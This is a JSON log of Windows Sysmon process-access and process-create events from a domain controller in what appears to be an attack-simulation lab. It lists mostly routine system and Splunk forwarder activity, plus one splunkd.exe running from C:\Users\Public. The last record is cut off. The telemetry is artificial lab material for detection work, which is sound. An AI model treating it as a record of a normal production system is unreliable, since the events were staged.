{"EventTime":"2020-08-01 06:50:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2832,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:22.704\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:22.704","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2833,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:22.704\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:22.704","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2834,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:22.704\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-10AE-5F25-0000-001041EA0400}\r\nTargetProcessId: 3868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:22.704","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-10AE-5F25-0000-001041EA0400}","TargetProcessId":"3868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2835,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:23.237\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:23.237","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2836,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:23.645\r\nProcessGuid: {E2A3D6B1-10AF-5F25-0000-00100DEC0400}\r\nProcessId: 2692\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nParentProcessId: 2792\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:50:23.645","ProcessGuid":"{E2A3D6B1-10AF-5F25-0000-00100DEC0400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","ParentProcessId":"2792","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:50:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2837,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:23.644\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nSourceProcessId: 2792\r\nSourceThreadId: 4028\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-10AF-5F25-0000-00100DEC0400}\r\nTargetProcessId: 2692\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:23.644","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","SourceProcessId":"2792","SourceThreadId":"4028","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-10AF-5F25-0000-00100DEC0400}","TargetProcessId":"2692","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2838,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:23.644\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-10AF-5F25-0000-00100DEC0400}\r\nTargetProcessId: 2692\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:23.644","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-10AF-5F25-0000-00100DEC0400}","TargetProcessId":"2692","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:50:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2839,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:23.644\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:23.644","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2840,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:23.644\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 